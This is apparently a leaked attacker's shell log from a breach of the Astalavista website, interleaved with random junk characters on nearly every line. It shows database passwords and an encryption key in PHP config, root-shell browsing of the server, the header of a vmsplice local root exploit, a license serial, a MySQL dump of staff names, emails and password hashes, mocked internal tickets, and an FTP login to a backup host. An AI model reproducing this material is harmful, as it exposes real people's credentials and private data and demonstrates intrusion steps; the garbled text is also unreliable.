$conxUser = ‘hostinguser’; // MySQL user
1 Z+ O1 v2 h& F4 _/ _$conxPassword = ‘cXvB3981′; // MySQL password$ B9 A9 I! V' j+ h! ^/ `0 W: n4 y
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
1 f4 o* Y9 c8 p' |% G3 Z$ K9 U+ y0 k?>( k: m1 H& o, Z) y$ S+ x8 V6 ^, z
% _3 f3 [. Z, S+ [2 ish-3.2# cd ..
0 y9 e$ {4 Y) d2 Hsh-3.2# cd com# C) t* F8 N( @/ C- e) \
sh-3.2# ls -la8 Y) o6 ]+ ?9 J, S
total 141208; ]2 r& x, N5 u ]$ y
drwx–x–x 10 com com 4096 Apr 28 12:40 .
6 w( W- ~! H T5 ^% L- y, A+ |$ ]drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ W B1 q5 J) `8 z- Z) S( ?: ^drwx—— 2 com com 4096 Jun 4 04:04 backups
% {. \7 D! |* }# O1 y-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
5 i- Z: { A5 B/ q2 D; W5 Ydrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system% s4 J$ B p, G
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
" Y K8 }1 J) T9 I-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout, f- f& B( Z5 h$ V6 w
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile2 ?* W6 ^6 B/ x% p5 E/ }7 u9 P
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc: j5 K7 V% O' ~9 `2 R
drwx–x–x 3 com com 4096 Jan 29 2008 domains8 d0 p2 J+ y5 c8 [
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed( ]" b! [+ g, ~& X x1 p I7 `
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
2 l" o% m0 C6 p* h5 }; ]' b& J-rw——- 1 com com 69 Nov 18 2008 .lesshst
: S6 e2 V$ ]3 C8 y/ jdrwx—— 2 com com 4096 Sep 24 2007 mail
' c( P6 C0 v3 S c# S0 I-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history# }9 n! N+ M- G, Y- ~6 p
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp) _2 z' h2 |$ |: A
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html1 T) w, k5 \# r; {, {- [
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
8 R8 A0 l( R! vdrwx—— 2 com com 4096 Aug 26 2008 .ssh
\$ p: R* a" @$ l3 ~; a8 M-rwx—— 1 com com 8515 Feb 10 2008 t$ _5 Y) k E+ ]; t, w2 S% T
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c' M) k6 z5 Y/ ] [8 W8 u: q' ~
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
$ M ]) C$ {9 H' W7 i% }4 k-rw-rw-r– 1 com com 617 May 20 2008 .toprc" p6 [; ~0 i, f& T( _
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql" n/ G( n5 L$ M
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
! t, m# O) u8 |. X- O-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
( k" L& ^0 ~0 c b5 e
( [# {0 z+ U* w' i: {sh-3.2# head t.c
, E6 G( ]% M5 } t- ^. [0 a/*" }6 a J. x* X: O2 u) f# C
* jessica_biel_naked_in_my_bed.c
/ {- D' y) s! B; q% P*
3 W9 o8 E! c5 Y* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.4 e4 [: l- p( e2 J+ Q6 g
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca./ q1 `, \+ T, d2 P' T J( d
* Stejnak je to stare jak cyp a aj jakesyk rozbite." Z3 O8 T6 J7 W- b: @! |
*$ E' e' k Q i! k/ k& R! M
* Linux vmsplice Local Root Exploit) G0 S; E t! r: r
* By qaaz( i1 Z" }! B t
*: E3 ^7 y5 T( R ~
$ H+ K! u) ]: P. ^
sh-3.2# cd /
# M; @" F1 m/ ?- Zsh-3.2# ls -la8 z8 a# z, P8 C' r8 A# b% Y) D* C
total 360. }5 K# l# j: e6 o& c
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
+ J1 S" R$ k9 Y) W% Bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..5 U: G: I, K* N4 m. `& f
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group; F$ Q2 C9 {6 x, v
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
$ |- z* n+ C6 s# q. {& D-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db) i0 F! y+ E% ^5 p. A4 u$ }# ~7 y6 n
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck8 K, x9 f! i/ \# H2 T
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
* ?5 z" {, F1 x, F9 t, |: }+ x* x/ f% wdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup% i* f3 S8 j0 M# @
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
! { i0 `7 z, [drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot- K7 Y8 K4 w8 J! g# X# T
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
! o. E1 p: m% u* r. T# sdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
: F3 T, _( d- o+ s; k) t. Hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
1 t1 g3 F/ Y0 d0 _0 B-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf+ t8 L" J9 |; j- c% } c
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
( k# ^4 r" B& ^: ^- Gdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib642 M: S5 X9 H( K0 h6 T( m
drwx—— 2 root root 16384 Sep 11 2007 lost+found! ^# L) m9 o* X1 ^- r
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media2 i7 ~: Z' w# K! X5 ]
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc$ p" G$ c. {5 p
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
* L% y4 t$ a, W0 @! I8 h8 S-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
$ n' _ Q0 [; |9 jdrwxr-xr-x 2 root root 0 Jun 3 02:43 net6 {# z9 I4 A+ Z+ X2 J0 H
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt. ^- u) V+ V9 o7 T+ }7 {
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc0 S( R9 X v! w6 A8 F" j
drwxr-x— 15 root root 4096 Jun 4 08:40 root2 J& `; k) O0 L1 }
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
( _2 M6 i+ g+ [1 Q1 t+ qdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux: U5 t4 r5 `, F; a1 D0 p. \ D4 X- t
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
, q3 m& L0 g! j. P3 d0 _drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
+ j% X1 t C8 J- i. @' Edrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp1 |1 t1 R l% F4 U7 u5 L
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
: c: D# B7 @3 D4 Bdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
1 \6 E- V+ u" @- |0 X* n, P' W( W% n2 T1 S6 Z
sh-3.2# cd opt
; \7 H2 v+ u2 Z" a" ~8 z- X+ nsh-3.2# ls -la0 M4 y+ {; O0 q( f! D$ ~
total 204 G" }5 I- y& x: x% d
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
3 J( L9 I! z6 r; G+ G. bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* D9 u1 p d1 e9 T* F
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws8 h: D) x; S `& d
# R* E0 k: d3 o ?! Qsh-3.2# cd lsws/
# E$ r5 z, }& ?. ]6 I8 T; x2 Dsh-3.2# ls -la- q7 M; c6 \7 ^$ j! C
total 108
" T5 x2 u" M' E( U* q m! ydrwxr-xr-x 15 root root 4096 Mar 20 2008 .3 [. q5 G1 E6 L8 F" U* ~
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
0 ~! J7 |6 l( p; j/ p9 edrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
" i2 d" z$ p0 I. v- X6 ddrwxr-xr-x 13 root root 4096 May 29 15:10 admin
8 @3 U0 |; y2 v8 G9 s, Adrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate( f4 L8 g& r' t, K+ a2 \ K
drwxr-xr-x 2 root root 4096 May 29 15:10 bin6 c: s8 k$ g% N f
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
( | G. A1 w1 s% v7 kdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
$ n/ |1 [; l, r3 E- gdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs0 m4 m3 A- q' F# O9 R
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
) D5 I! [& y. t }) Ydrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
; |1 ?4 K* L- Q; T8 d: t! ~, b-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
- X: u+ Q6 e0 H$ T0 I- V1 g3 h-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP7 C' Y9 C3 D3 |! V0 z
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
6 c2 k- R9 T- S9 |' X* X; A5 V-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
0 U/ C6 m3 \& a% W+ Edrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
/ z; V6 b3 c# ?* ^drwxr-xr-x 2 root root 4096 Mar 20 2008 php
! r" i+ H4 }( _( l4 Y5 o( a+ t* Mdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild' i4 r; c8 r [/ x4 f' z7 ]
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
* I3 _# j) k) J0 z-rw-r–r– 1 root root 6 May 29 15:10 VERSION
/ R0 b' w, B1 B! y& [3 ]
( W3 a2 o/ u; f0 h2 y; A# A, _9 hsh-3.2# cd conf
$ c( v; L3 k+ I7 d. Jsh-3.2# ls -la
7 g( |0 i1 k. N: V5 N# vtotal 48
# p) U! w5 t" W/ u$ l0 o% _. [drwx—— 4 apache apache 4096 Jun 3 02:43 .- p2 p* w4 {- Y0 P* P
drwxr-xr-x 15 root root 4096 Mar 20 2008 ... Z0 ?' w' v b* E
drwx—— 2 apache apache 4096 Mar 20 2008 cert0 c5 d2 X. X7 j+ f
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
5 ]9 H& h) t g6 z9 ]; {-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
: E T* o% e& S& g-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
- \8 ]! ^) h& T-rw——- 1 apache apache 256 May 29 15:10 license.key
0 r( t% u) g' [6 k# G# p. H0 l-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
% O$ q9 l$ _" a) X* z-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
9 Y% Q7 Q. v2 j) b-rw——- 1 apache apache 20 May 29 15:10 serial.no
/ M0 e9 j2 B) i; ]# Idrwx—— 2 apache apache 4096 Mar 20 2008 templates
b2 w3 A w" C$ D/ I2 m
; y+ _) {. k0 C' D( v" Vsh-3.2# cat serial.no
! {3 I$ [3 s. y" e" ~IbDl-oVsO-CKqL-wVRa
. Y* ]8 s/ a- B- e' K; a6 T7 d
( o$ Y, _5 }2 b+ P4 P( Zsh-3.2# mysql
% d) h! N3 ?: D! N$ vWelcome to the MySQL monitor. Commands end with ; or \g.
8 u8 J# ^. j; G0 C. b( hYour MySQL connection id is 2868447 c5 S% p2 \" Z( n4 J% m
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
3 P+ {* G) e' o6 K2 O0 i
/ O! u% p( R; T! P J- e. H; Z8 M7 pType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.5 }% ?% q/ ` g; m
& e3 u0 e0 M: Y+ W' e% c
mysql> show databases;% B+ x$ R+ j8 M' T% @
+———————–+ }9 h+ z9 Y4 G8 Y ?# J
| Database |
& e& K+ g& B+ s" K+ F+———————–+
/ }: N" a6 h+ H! ?| information_schema |
" O; }/ j; z5 K, c| astanet_ads |$ j$ W& p0 D; z& A) t2 e
| astanet_mailing_lists |
: [ l$ Y8 M) [- {* [| astanet_mediawiki |
; e- u8 p" }1 N# Y* m| astanet_membersystem |+ T' }; w$ I, o, j* m" c
| com_contrexx |
% T3 u: g4 _. L| com_contrexx2 |
" T# o% M4 X8 {; `# t) V0 t$ J| com_contrexx2_live |) ~: L& Y4 } Y
| da_roundcube |5 W. l5 @- {7 S9 `4 m
| dolphin |+ j$ M3 T3 j: e4 G2 c- ]3 z9 p
| ideapool |
# |0 U4 a- K) @; E* h; S9 X* M| mysql |, i' p& \; @% v
| test |3 a8 ~8 V( K' o/ \+ m
| yourmaster |
) Y) V- T+ e6 _+ B: x- Z5 B+———————–+
) W! _) I% J8 i) z( Z14 rows in set (0.00 sec)" h0 q9 [6 n T8 w9 \( S
4 e( G" G9 E0 dmysql> use ideapool& i9 z- w( [& G) D5 l, F
Database changed+ a2 B! s, x' o5 d5 _7 r! i4 U% g
mysql> show tables;' Y, l6 f- N1 g( O8 M; a. O
+———————————–+
/ g) _5 n6 l4 d N1 Q6 V' Z' T| Tables_in_ideapool |: d7 D+ g, z4 ^& U: R: i$ @
+———————————–+
9 T& w$ I8 r: i* A| eventum_columns_to_display |+ K+ P8 S. W. t; T( G
| eventum_custom_field |9 d- [/ X9 k. Q. n$ H! N# [1 H- M
| eventum_custom_field_option |. K! x* q- k/ Z! D( @! h1 c
| eventum_custom_filter |
( {+ {( _& Z, m- b1 q| eventum_customer_account_manager |5 }) z% P1 D1 Q3 ?# T
| eventum_customer_note |
" ]1 m2 x- K( h. _$ g| eventum_email_account |
. S9 L+ B/ o4 o- o9 u. ?4 t| eventum_email_draft |
+ n, X3 C8 p& F9 ?$ m| eventum_email_draft_recipient |
) h0 {$ g l* s1 O7 I! ]2 Z| eventum_email_response |
; v- {- r1 R6 n( X1 ?! M* R* z| eventum_faq |
) l8 v$ X p, Y( h t| eventum_faq_support_level |
* a& ^& a( y+ J" g, O| eventum_group |2 C1 s; }! t- j: g; s2 u
| eventum_history_type |+ B8 T8 ^: N7 r, F8 h( l" v
| eventum_irc_notice |
* |* B6 u. P5 o G5 Y| eventum_issue |
2 w4 X. A5 k- [$ d| eventum_issue_association |) N2 k! D: T( M2 K
| eventum_issue_attachment |; P5 D. p1 u8 j: w
| eventum_issue_attachment_file |
! R) e. M9 H" |3 U. U| eventum_issue_checkin |
( A7 ?" M) f* {) {+ R| eventum_issue_custom_field |( \/ M) e6 c2 ?. B# \; X
| eventum_issue_history |% }. X( A, J# p4 s+ c
| eventum_issue_quarantine |
) l5 u/ F1 L' x+ _| eventum_issue_requirement |
/ w" `; w* T5 ?8 Y8 A| eventum_issue_user |. Y, o7 T. o3 K. D! H1 }8 x# F0 M9 `
| eventum_issue_user_replier |
3 W* z% O: T) D8 a+ o4 B| eventum_link_filter |) `3 P( c r' T5 F- ], U
| eventum_mail_queue |
! y }6 Z, z) ?4 E| eventum_mail_queue_log |' o3 e# @! ]) _) m+ k
| eventum_news |: e3 }/ s) C5 X3 ~* q
| eventum_note |
6 y9 t ^, k( }* U| eventum_phone_support |
; z0 p* b3 q3 }9 o9 H& m. }* [/ h| eventum_project |
% V- m7 h4 i6 [8 _& ^0 c. G| eventum_project_category |# n1 _0 \8 y3 H Q/ c1 t& _
| eventum_project_custom_field |
1 d, |& f0 _, X+ u/ l1 e: A| eventum_project_email_response |7 F' @* F: R6 g( n
| eventum_project_field_display |/ h3 W, p& ~3 q& b4 O0 ^
| eventum_project_group |
" B, v% P; M: j9 T) p+ }| eventum_project_link_filter |, g& j/ H' c8 }1 g4 c4 M
| eventum_project_news |, V$ K3 a6 m3 B
| eventum_project_phone_category |
+ ?( X" u- N* X1 w2 f+ ~6 V| eventum_project_priority |
3 E h$ @; j8 B: Q| eventum_project_release |2 W/ T0 Z; L1 }
| eventum_project_round_robin |
# @8 W0 T& P, Z9 `& M| eventum_project_status |
$ T/ f) c1 C8 {0 b9 j8 h: {| eventum_project_status_date |9 }6 X$ A n3 w* M5 x- A t8 x+ X
| eventum_project_user |
& U, Y) h1 ^0 ~8 z3 x0 o r4 d5 o| eventum_reminder_action |1 V+ N3 ^" r& G: s7 o9 V/ d- U
| eventum_reminder_action_list |
0 Y7 I4 [8 |4 P: {| eventum_reminder_action_type |
; J" O$ W$ M$ a9 A+ p o| eventum_reminder_field |
. m$ o! A: o, R| eventum_reminder_history |! W4 m& t* q1 C# a. a' S8 ]
| eventum_reminder_level |6 Y3 Y5 h W5 H p+ i
| eventum_reminder_level_condition |
6 c+ L, g+ L3 G0 j+ M6 T2 n3 ~8 ~% y| eventum_reminder_operator |
. _+ y3 g; k" [0 f# f1 h| eventum_reminder_priority |
8 q* M* w4 C5 r5 U; H7 ^% _| eventum_reminder_requirement |% a6 j. z4 C7 p; g* d' h
| eventum_reminder_triggered_action |
3 Q$ x; Y' W3 j4 o2 m| eventum_resolution |
, l9 Z$ Q/ ?6 M: M) B| eventum_round_robin_user |0 f* T7 F, g* P
| eventum_search_profile |7 m; L. }/ j( D' ?2 p
| eventum_status |" J% h3 ?% N9 \- ?. t) F( k
| eventum_subscription |7 \ d4 [$ O8 K5 u$ S
| eventum_subscription_type |2 W, X z+ o0 C& w! u5 N9 O+ l
| eventum_support_email | ~$ q3 o7 `6 I' F
| eventum_support_email_body |/ Q4 S }. F1 _ o) H! q
| eventum_time_tracking |
' j) H8 V/ d" ]: m5 f| eventum_time_tracking_category |( P8 ?* v, M& ?; e8 ], e1 }: P
| eventum_user |
2 E% u' u+ D/ {/ G; I5 t6 H8 ?+———————————–+
. S+ X& O, N. X, _) w0 _69 rows in set (0.00 sec)
% @6 ]- c/ L K' @0 I. F% t! A" p2 x1 c* J5 R1 _( f0 I
mysql> describe eventum_user;
6 d$ Z4 M* H( D% J* Y: a+————————-+——————+——+—–+———————+—————-+* U `. x& e2 H! U. L; b: X' z
| Field | Type | Null | Key | Default | Extra |
: {6 T2 u8 T0 N/ [* N+————————-+——————+——+—–+———————+—————-+
: n6 Z, e5 c6 L2 Y' J; M3 I1 U| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
; L1 }( J; O D0 x$ X9 j| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |, d+ H8 M8 A) p5 y$ h1 h
| usr_customer_id | int(11) unsigned | YES | | NULL | |
7 o2 l+ }) o6 u8 E; p| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |! P8 a" n. n7 Y6 e: x$ D! N- ]
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |0 k, f/ @! J" Y! y7 I1 p. v- T4 K
| usr_status | varchar(8) | NO | | active | |
0 \ [1 y. _( U0 b" `# {1 o| usr_password | varchar(32) | NO | | | |: a& W4 [! q% m& X
| usr_full_name | varchar(255) | NO | | | | J" c) s) N8 k; t9 S. j$ |
| usr_email | varchar(255) | NO | UNI | | |& @# \+ q" r) U9 }) `
| usr_preferences | longtext | YES | | NULL | |
" q& V1 k3 I0 H0 G% `3 [# G: M| usr_sms_email | varchar(255) | YES | | NULL | |- S7 k* [' i4 h7 E& t9 p( v5 {6 \
| usr_clocked_in | tinyint(1) | YES | | 0 | |
# h6 t3 w8 `9 }7 Y8 ]& c| usr_lang | varchar(5) | YES | | NULL | |
6 e6 F- ~( g$ \/ ?' Y+————————-+——————+——+—–+———————+—————-+$ E" o) v a- Q! z9 E' H
13 rows in set (0.00 sec)1 N' p0 m; l% Y8 P V$ T& e! ?
- e' ~" o9 r* A3 a
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
, D% s: q) o# H$ `6 p T, V+———————-+——————————-+———————————-+* @' ^% d1 p$ n4 W
| usr_full_name | usr_email | usr_password |* V# _# ~2 i) @; O
+———————-+——————————-+———————————-+! }, e5 ?; \) s& q' e
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
: L) h/ g1 z H9 ^| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |- Y! K# ^$ h# u8 n
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |' e) V1 K2 c2 e6 M6 D1 L( t
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |% W1 @5 K' C% i1 G
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |5 R9 ^9 a% Z6 {
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
& l+ o& m! W# I6 U W| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
' q7 Z X# n I| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |6 Y: K. e8 b; X* F3 K0 k7 Q
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |) e% X2 _- ]1 ]% N
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |! E" ~. g* b* B; r' }
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |+ x* P% m3 C% Z8 \* l0 Y
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |+ I. ~2 i: x( I: l: h3 t
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
, ?/ [+ ~3 L! ]* ~/ a| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |( I$ [/ d9 B @/ n/ g( c' `
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
, \3 p2 u# E: k) Q. Q* A1 g+———————-+——————————-+———————————-+
1 S2 g; n+ H: W, p* w15 rows in set (0.00 sec): k+ v& `4 F2 m" Y2 J4 d
! U( D; Q0 n+ C' Z* e% v8 H/ H1 Mmysql> select iss_description from eventum_issue where iss_id = 43;
$ V( R- X2 I; Z( H6 U+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
) Q6 w9 I X; y, u' j| iss_description
# c* ]" G- H$ f|
5 ]+ e. [8 n8 T% G) ~+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+* J9 O6 [7 K) H3 c
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be7 J3 H1 ^6 Q X- F
connected for 90 mins… 120mins… so what i propose is something like:" J+ F: {, w" Z, x' Y$ M2 V
链接标记[url]http://www.surfthechannel.com/[/url]& R$ q* b; P. }0 v$ w" L1 F
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system ^; X# e% U3 u" y0 G
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
j# y% i/ W) f& Cbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
" \4 V, `( b5 x* zif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…# [ ] P7 T# a) Z; }' a
- s/ a9 Z( x& _9 D3 y! D9 OWe could also put advertisement during play on the flash video player itself… extra $$…# P2 r2 q" U0 \ r) @' S
: c( l* n& q- t; SBy sykadul |
6 w2 T) u7 I0 }# u4 `! l- k+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-++ D, x: g4 @# r/ u/ U
1 row in set (0.00 sec)) H5 e5 }1 A# ~0 m! m; Q5 c
# x5 N# R! |- r! m' x- y) Y
// Money and extra $$ is all they care about. remember that.3 T; m$ m" j. n1 u1 u) ^
) o) ~# J" _/ E, m. A5 Umysql> select iss_summary,iss_description from eventum_issue where iss_id =42;* k! u( r8 C) _; L( `
+————————+——————————————————————————————————————————————————————————————————————————————-+
" z" Q4 a" X* P A0 @4 W6 @| iss_summary | iss_description
' A$ m+ q8 b( b( W5 K|& m. H% M( N0 t
+————————+——————————————————————————————————————————————————————————————————————————————-+
l2 v" K9 K/ j% `) R2 U1 a5 A| Forum for REAL EXPERTS | Hello,) @1 o) z3 v0 H" r0 Y
+ u; H- @0 v7 q6 eIshtus and I,- m6 d. E+ u5 U0 `5 ?7 K9 G; r5 ]/ T
" U( y! o: Z+ q# {+ G' E) l8 ^Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
4 Q/ v/ y* I* L# \ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
' f& |' C2 c: D% k" a6 X' r2 @' ^* w9 v- X5 X
One example a friend of mine from coresecurity.com!
8 M( Y3 z9 j4 o1 @8 D# l l- i% n) G; Q
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
% Y- m2 V/ F" w+ S. V6 o0 h; \0 @7 K! H8 H+ h0 ~* W- R
|% T: j# B! L8 ]: h# w9 R
+————————+——————————————————————————————————————————————————————————————————————————————+
6 W$ X- Z1 j5 ]- u1 row in set (0.00 sec)
8 i. u. c1 T5 m3 @+ I, S; X/ S) A x
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…! c2 T$ i9 L& m" C6 s& Q
9 O& O# E" G6 L8 n* _
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;4 z! [ ?0 [( w& Y3 J& {
+——————+———————————————————————————————+2 u: d! J* Y3 c. p+ b2 i6 F. t
| iss_summary | iss_description |. h0 y; A8 k+ d
+——————+———————————————————————————————+
6 f p" t$ {. N1 K3 c0 I. {3 [| Website guidance | Virtual Girl which guides you trought the website.: f( t/ ^8 m4 H2 J, Y4 r
n5 v4 ?1 z. O3 n
We need a girl with who you can ( talk )!!!
: |8 j( N' r; V, M' A3 r0 wAlso for the News!
8 U! X- `2 @/ `7 JSo my suggestion is a girl who read you the news loud if you like!: N! e7 F( }" c4 t2 q |6 |' v
you can choose between read yourselfe or she read it for you or both!
0 v" P* m' Y- f& i: e/ s$ U" s: j4 j/ I& k: x
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!5 F- S2 D9 _2 K1 [+ G
) c. F1 C( v+ E2 k" lHave a look on the example girls!!8 o- h. G3 e7 H
, R( b# J6 h2 A* B6 l- R r3 ?链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]' V# Z" |/ q9 M0 U0 k3 Y1 ]7 j+ T' G
# i$ Q3 O- T- eor that
' p: Q+ K* D- q# t% p. @# [: E! w
% w0 M I* o& ~; n% v0 A$ Y3 D6 [链接标记[url]http://www.yellostrom.de/[/url]) c/ {4 o: J9 c: V7 z5 }1 [7 ?
! p' ]0 p. e- z# q8 E
|
7 ]/ i; u% d" i. I W+——————+———————————————————————————————+0 @8 {4 [' u% a; [) r6 H; k
1 row in set (0.00 sec)
0 j2 Q9 O' y* s5 f5 }: }6 W4 V, K$ t( d9 ^6 k- P( E% j l
// ha ha.
' j% ~: G- Q) u }8 [: d2 w) W9 X; ?/ U1 H
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
* K/ l4 x0 }( ?# O+————————–+———————————————————————————————————–+" C- G+ f9 {! S
| iss_summary | iss_description |9 t7 W/ P0 l g# {
+————————–+———————————————————————————————————–+# d2 U; G1 w& p+ S; c
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
3 I7 n p2 Z' J+————————–+———————————————————————————————————–+
2 S6 U$ `9 B+ s) l; T2 d1 row in set (0.00 sec)+ f- V9 a2 a* ?8 |* L ]
# l4 v7 I* Q; s- R
// LOL.! T: D4 D3 T6 ^: f. M
& U$ c( y; M, V! {* D% q) z$ P( ~mysql> exit
% @ l2 Q) w/ S/ mBye
1 k: l9 K2 \0 B* _
0 i- @, W; L: L: K; \- csh-3.2# ftp 212.254.194.163
5 K/ p* g6 U0 V% UConnected to 212.254.194.163.
& S, g- n) t) ~. G: F- i1 v9 c$ Y220 BackupCOM_VW FTP server ready.
/ m1 R, H" S6 s {3 t1 y; `$ j! n504 AUTH: security mechanism ‘GSSAPI’ not supported.
$ ]4 Q7 y; m/ {4 D! Q504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
/ s: s7 b4 b0 X7 `! v: QKERBEROS_V4 rejected as an authentication type3 J9 ~* N4 q0 x6 P4 ~
Name (212.254.194.163:root): astalavista.com! g5 J" H$ s2 _! t- f
331 Password required for astalavista.com.9 M9 b s H r1 `( a. o
Password:! O) s! B" u/ @% F) v: f
230 User astalavista.com logged in.7 g6 f, X; K8 m* O2 Q7 P* `% \1 b `
Remote system type is UNIX.2 B2 u4 S7 N- C
Using binary mode to transfer files.
; B( h. m& S6 W) K3 T; {) Bftp> ls -la3 ]- t" ~# _% G; Z& j$ S! }7 s1 T3 k8 j
227 Entering Passive Mode (212,254,194,163,2,188)% [; w2 e( X$ i( r! Q# s. {
150 Opening BINARY mode data connection for ‘file list’.
